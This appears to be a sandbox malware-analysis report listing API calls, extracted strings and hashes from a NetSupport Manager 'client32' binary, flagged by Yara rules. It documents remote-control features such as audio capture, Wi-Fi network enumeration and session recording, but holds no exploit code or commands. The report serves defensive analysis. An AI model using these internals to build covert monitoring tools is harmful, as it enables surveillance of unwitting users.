                                                                                  • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
                                                                                  • API String ID: 2153351953-120756110
                                                                                  • Opcode ID: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                                  • Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
                                                                                  • Opcode Fuzzy Hash: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                                  • Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                                  APIs
                                                                                  • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                                  • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                                  • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                                  • API String ID: 3054845645-718119679
                                                                                  • Opcode ID: 00ec13e67940f28baf0848d28a2c1b2f51011c725dd50b87b3bc4ac92110142a
                                                                                  • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                                  • Opcode Fuzzy Hash: 00ec13e67940f28baf0848d28a2c1b2f51011c725dd50b87b3bc4ac92110142a
                                                                                  • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • wsprintfA.USER32 ref: 110EB5D8
                                                                                  • GetTickCount.KERNEL32 ref: 110EB632
                                                                                  • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                                  • GetTickCount.KERNEL32 ref: 110EB64E
                                                                                  • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                  • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                                  • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                  • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                  • API String ID: 3451743168-2289091950
                                                                                  • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                  • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                  • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                  • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                  APIs
                                                                                    • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                    • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                    • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                    • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                    • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                  • _calloc.LIBCMT ref: 1103945C
                                                                                  • GetSystemMenu.USER32(?,00000000), ref: 11039490
                                                                                  • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
                                                                                  • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                  • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                  • UpdateWindow.USER32(00000000), ref: 11039567
                                                                                  • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                                  • MessageBeep.USER32(000000FF), ref: 1103957F
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                  • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                  • API String ID: 4191401721-1182766118
                                                                                  • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                  • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                  • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                  • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                  • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                  • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                  • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                  • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                                  • _memset.LIBCMT ref: 110CB51B
                                                                                  • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                  • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                                  • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                  • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                    • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                  • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                  • API String ID: 2220097787-1587594278
                                                                                  • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                  • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                  • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                  • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000004), ref: 11003691
                                                                                    • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                    • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                    • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                                  • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                                  • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                                  • SelectObject.GDI32(?,?), ref: 110036CC
                                                                                  • GetSysColor.USER32(00000010), ref: 110036DC
                                                                                  • GetSysColor.USER32(00000010), ref: 110036F3
                                                                                  • GetSysColor.USER32(00000014), ref: 1100370A
                                                                                  • GetSysColor.USER32(00000014), ref: 11003721
                                                                                  • GetSysColor.USER32(00000014), ref: 1100373E
                                                                                  • GetSysColor.USER32(00000014), ref: 11003755
                                                                                  • GetSysColor.USER32(00000010), ref: 1100376C
                                                                                  • GetSysColor.USER32(00000010), ref: 11003783
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                                  • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                                  • SelectObject.GDI32(?,?), ref: 110037CE
                                                                                  • SelectObject.GDI32(?,?), ref: 110037D8
                                                                                  • DeleteObject.GDI32(?), ref: 110037DE
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                  • String ID:
                                                                                  • API String ID: 3698065672-0
                                                                                  • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                  • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                                  • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                  • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,50D94AA1,?,?), ref: 1104B8F6
                                                                                  • _sprintf.LIBCMT ref: 1104B923
                                                                                    • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19
                                                                                  • _strncpy.LIBCMT ref: 1104BACE
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                                  • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 3341947355-3231647555
                                                                                  • Opcode ID: 64337eb117a7921071321d93dca20efb02aada447dc6f5f42f1380f107080c29
                                                                                  • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                                  • Opcode Fuzzy Hash: 64337eb117a7921071321d93dca20efb02aada447dc6f5f42f1380f107080c29
                                                                                  • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                                  APIs
                                                                                  • _calloc.LIBCMT ref: 1104702F
                                                                                  • wsprintfA.USER32 ref: 110470AE
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • wsprintfA.USER32 ref: 110470E9
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                  • _strrchr.LIBCMT ref: 1104720C
                                                                                  • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                  • _free.LIBCMT ref: 11047251
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                  • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                  • API String ID: 1757445300-1785190265
                                                                                  • Opcode ID: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                  • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                  • Opcode Fuzzy Hash: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                  • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • _malloc.LIBCMT ref: 1100B496
                                                                                    • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                    • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                    • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                    • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,50D94AA1,?,00000000,00000000), ref: 1100AD54
                                                                                    • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                    • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                    • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                    • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                    • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                    • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                    • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                  • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,50D94AA1,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                  • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                  • _calloc.LIBCMT ref: 1100B519
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                  • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                  • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                  Strings
                                                                                  • DisableSounds, xrefs: 1100B472
                                                                                  • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                  • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                  • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                  • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                  • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                  • Audio, xrefs: 1100B477
                                                                                  • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                  • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                  • API String ID: 1843377891-2362500394
                                                                                  • Opcode ID: 1fe7b9b6c0f710ae84cdce54030855f788110a3df0201f205448bfee00d84397
                                                                                  • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                                  • Opcode Fuzzy Hash: 1fe7b9b6c0f710ae84cdce54030855f788110a3df0201f205448bfee00d84397
                                                                                  • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                  APIs
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                                  • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                                  • _fgets.LIBCMT ref: 1102BB10
                                                                                  • _strtok.LIBCMT ref: 1102BB38
                                                                                    • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                                  • _fgets.LIBCMT ref: 1102BB74
                                                                                  • _strtok.LIBCMT ref: 1102BB88
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                  • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 78526175-1484737611
                                                                                  • Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                  • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                                  • Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                  • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
                                                                                  • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
                                                                                  • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
                                                                                  • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
                                                                                  • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
                                                                                  • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
                                                                                  • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                  • API String ID: 2439742961-1736626566
                                                                                  • Opcode ID: 6cb80e4ba42ffe2f6d3fe0fc7e02658a82289641e696ec289b07654b65deaaf3
